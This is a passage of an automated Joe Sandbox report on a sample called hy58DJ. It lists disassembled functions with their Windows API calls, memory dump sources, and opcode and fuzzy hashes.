                                      • Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                      • Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
                                      • Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                      • Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                      • Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
                                      • Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                      • Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200
                                      APIs
                                      • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                                      • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                                      • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: StringType$ByteCharMultiWide$ErrorLast
                                      • String ID:
                                      • API String ID: 319667368-0
                                      • Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                      • Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
                                      • Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                      • Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300
                                      APIs
                                      • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                                      • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                                        • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                                      • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                                      • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                      • String ID:
                                      • API String ID: 1390108997-0
                                      • Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                      • Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
                                      • Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                      • Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                      • String ID: csm$csm$csm
                                      • API String ID: 3523768491-393685449
                                      • Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                      • Instruction ID: 939cc247c4c59751e97e3792d57f705447d71fb9536ed6ea71b01dee638c6d46
                                      • Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                      • Instruction Fuzzy Hash: 06E1E332B08B828AE7209F36D4443BD77A0FB44B68F5401B6DE8D4766ACF38E5A1C741
                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,00007FFE1A4C8BC9,?,?,?,?,00007FFE1A4C8C14), ref: 00007FFE1A4C95CB
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE1A4C8BC9,?,?,?,?,00007FFE1A4C8C14), ref: 00007FFE1A4C9601
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE1A4C8BC9,?,?,?,?,00007FFE1A4C8C14), ref: 00007FFE1A4C962E
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE1A4C8BC9,?,?,?,?,00007FFE1A4C8C14), ref: 00007FFE1A4C963F
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE1A4C8BC9,?,?,?,?,00007FFE1A4C8C14), ref: 00007FFE1A4C9650
                                      • SetLastError.KERNEL32(?,?,?,00007FFE1A4C8BC9,?,?,?,?,00007FFE1A4C8C14), ref: 00007FFE1A4C966B
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Value$ErrorLast
                                      • String ID:
                                      • API String ID: 2506987500-0
                                      • Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                      • Instruction ID: e49fe522183b04e6d55ac23c51347fe000467c410b1e09902aa0b85fc2d5e023
                                      • Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                      • Instruction Fuzzy Hash: B1116A28B0DA426AFB556733555113D22829F44FB0F8447F7E87E866FBEE6CA4628200
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                                      • String ID:
                                      • API String ID: 3326452711-0
                                      • Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                      • Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
                                      • Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                      • Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterLeaveTimerWaitable
                                      • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                                      • API String ID: 2984211723-1229430080
                                      • Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                      • Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
                                      • Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                      • Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                      • Instruction ID: c0cf49a44d33e0dc5b9c5433f18908d4c11304275908aa310339e3b3461eb30a
                                      • Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                      • Instruction Fuzzy Hash: F8F04F61B19E0282EB108B26A4943396320AF95BB5F9407F6DA6D462F8DF3CE059C340
                                      APIs
                                      • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                                      • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                                      • ExitProcess.KERNEL32 ref: 0000000140008545
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: AddressExitHandleModuleProcProcess
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 75539706-1276376045
                                      • Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                      • Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
                                      • Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                      • Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: AdjustPointer
                                      • String ID:
                                      • API String ID: 1740715915-0
                                      • Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                      • Instruction ID: 8a60bf5aad5b74013ca3e137b9152b06b799f8074d20503e2ebd939825871406
                                      • Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                      • Instruction Fuzzy Hash: 4DB1B125B0AE4281EB65DB5396492386390AF54FE4F9984F7DE4D077AEDE3CE4618300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: FileInfoSleepStartupType
                                      • String ID:
                                      • API String ID: 1527402494-0
                                      • Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                      • Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
                                      • Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                      • Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CommandLine$ByteCharErrorLastMultiWide
                                      • String ID:
                                      • API String ID: 3078728599-0
                                      • Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                      • Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
                                      • Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                      • Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                      • String ID:
                                      • API String ID: 1850339568-0
                                      • Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                      • Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
                                      • Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                      • Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: _set_statfp
                                      • String ID:
                                      • API String ID: 1156100317-0
                                      • Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                      • Instruction ID: 2fd7e2b00d63da3d6ff392e8da02c71f57c05e083912183f9778b9f7cd69117f
                                      • Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                      • Instruction Fuzzy Hash: 74119172F18F0B01F754116AE56637910416FA8BB5F9806F6E9AF062FFAF2CA8604101
                                      APIs
                                      • FlsGetValue.KERNEL32(?,?,?,00007FFE1A4C766F,?,?,00000000,00007FFE1A4C790A,?,?,?,?,?,00007FFE1A4C7896), ref: 00007FFE1A4C96A3
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE1A4C766F,?,?,00000000,00007FFE1A4C790A,?,?,?,?,?,00007FFE1A4C7896), ref: 00007FFE1A4C96C2
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE1A4C766F,?,?,00000000,00007FFE1A4C790A,?,?,?,?,?,00007FFE1A4C7896), ref: 00007FFE1A4C96EA
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE1A4C766F,?,?,00000000,00007FFE1A4C790A,?,?,?,?,?,00007FFE1A4C7896), ref: 00007FFE1A4C96FB
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE1A4C766F,?,?,00000000,00007FFE1A4C790A,?,?,?,?,?,00007FFE1A4C7896), ref: 00007FFE1A4C970C
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Value
                                      • String ID:
                                      • API String ID: 3702945584-0
                                      • Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                      • Instruction ID: 2fda6c3d48085574eaa7fdbd5fefdd09270eba69a7e99d7fce3790ba5c62ed3a
                                      • Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                      • Instruction Fuzzy Hash: F6119D24B0EE42A9FB586737655117921419F40FF0F8453F6E87D866FFEE6CA4628200
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Value
                                      • String ID:
                                      • API String ID: 3702945584-0
                                      • Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                      • Instruction ID: a3040c9f0bd860cd4096ce5600fb2b9654eb805d6d11ac1ce0cd4cac384aa4e9
                                      • Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                      • Instruction Fuzzy Hash: A7115E14F0DA0369FB686633441117911418F40F70FC407FBD47E4A2FBEE6CB4628200
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                      • String ID:
                                      • API String ID: 1445889803-0
                                      • Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                      • Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
                                      • Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                      • Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CallEncodePointerTranslator
                                      • String ID: MOC$RCC
                                      • API String ID: 3544855599-2084237596
                                      • Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                      • Instruction ID: d321c9a5b9f7a5a317f66254400fb3802ae7aaa4ca47213e532ab7dc094fe746
                                      • Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                      • Instruction Fuzzy Hash: FB91A373B08B918AE710DB76D4402BD7BA0F744B98F5041BAEA4D17769DF38D1A5C740
                                      APIs
                                      Strings
